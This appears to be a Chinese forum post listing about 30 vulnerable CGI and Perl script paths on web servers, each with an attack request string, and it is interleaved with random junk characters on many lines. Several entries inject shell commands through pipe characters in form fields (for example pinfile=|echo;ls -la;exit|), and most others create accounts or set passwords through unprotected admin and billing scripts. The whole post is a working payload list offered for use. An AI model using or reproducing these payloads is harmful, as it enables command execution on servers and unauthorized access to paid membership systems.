Cgi-bin 30个漏洞＋使用方法

admin

==============================
( F2 Q1 j3 r3 p& G, u
/smspass.pl
/ ~3 k1 B$ [! \& w# Kusername=username&password=password

' F2 n$ Q; @$ e( w" r/index.cgi
6 Q) H$ k6 q$ dwei=ren&gen=command
4 ?" @3 T; f; z2 V5 ]
* T* @1 x. _, x4 v4 ^/passmaster.cgi
Action=Add&Username=Username&Password=Password

- l" A; r0 d5 b  |: t1 F* F  v6 a/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
0 D. i  Z  |4 ^" O& Q6 ?: l
! {5 D* b1 l, B' r3 t$ q/form.cgi
, r, i! h3 G% k% v# Oname=xxxx&email=email&subject=xxxx&response=|echo;ls|
! u% B$ V9 X1 m2 g9 V1 |
! m( w  F9 c% `9 T* R( I! h/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

8 l) O. S7 t9 N/ t- {7 O% [/ccbill-local.asp
post_values=username:password

/count.cgi
pinfile=|echo;ls -la;exit|

/recon.cgi
* M/ s& m- a0 }# |* X9 p/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
. K7 z2 w5 s0 D1 n
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
2 V: j- X/ e$ L: Y# [0 b; v5 z
/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
3 R4 D9 a& k4 K9 `) w+ D$ ousername=username&password=password&expire=30

  S' O3 U- @+ D( ]/openjournal.cgi
% R0 {8 w+ q4 iedit=1&ct=2&go=|echo;ls -al;exit|

  o8 E$ D4 |5 D1 X! @" E# @/gx9passwd.cgi
cmd=ADD&user=username&pass=password
( E. |  n& Y( a$ s# T
/probecontrol.cgi
4 f3 i# g1 S/ l9 rcommand=enable&username=username&password=password
8 d. ?8 M) x7 F: J. X3 U# E  O
/recon.cgi
# Z. W" t; d% k1 Z- v+ w5 asearchoption=3&searchfor=echo;ls -la;exit

/htadd.pl
configfile=|echo; ls -alt; exit

1 u- n' a$ U( G+ ?/gx9passwd.cgi
8 @, O( u, f7 v. H& lcmd=ADD&user=username&pass=password
( T& |2 n/ S7 {$ l' u! a
5 r) ~% c* D6 e0 e6 ^) f/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

8 y  B1 f4 [0 J9 K* U/cpay.cgi
9 x. w6 P2 u9 M, V) Z' _9 rcommand=add_member&username=username(EMAIL)&password=password(DES)
: G' N2 Y- T5 ^' C, f! z# \- J
/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
9 R, a) F3 l' A" b
/ _  r  J) U2 C/usercontrol.cgi
0 A) G4 f5 y) v+ I) s1 y" M- Y9 W. bcommand=enable&username=USER&password=PASS
; I+ J! z+ s; ?5 Q
/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

/addusr.pl
5 o+ K* m7 k3 muser=USER&pass=PASS&confirm=PASS
8 B1 C' v0 O* R/ Y. K4 o* n* S) n
/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
; x# Q) V8 |# S! D$ y8 apinfile=|echo;pwd;exit|

/accountcreate.cgi
9 j  P  Q$ ?* `& R( c/cgi-bin/gateway/accountcreate.cgi
! _, \$ m2 C6 C$ v7 r/ \4 m+ Busername=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
8 ~9 z0 d5 k  E3 ~( F1 \/env.cgi
ADD+;echo;pwd;exit
# @* [; M! J2 Q; F# }
/count.cgi
. E4 T0 N% G1 E' j& ipinfile=|echo;pwd;exit|
4 g) X/ P4 k1 t
/recon.cgi
6 R* v8 v7 n- c# C) ^1 z3 lsearchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
8 _0 `( g  l6 O. g; {6 w2 j1 Rusername=username&password=password&expire=30

==============================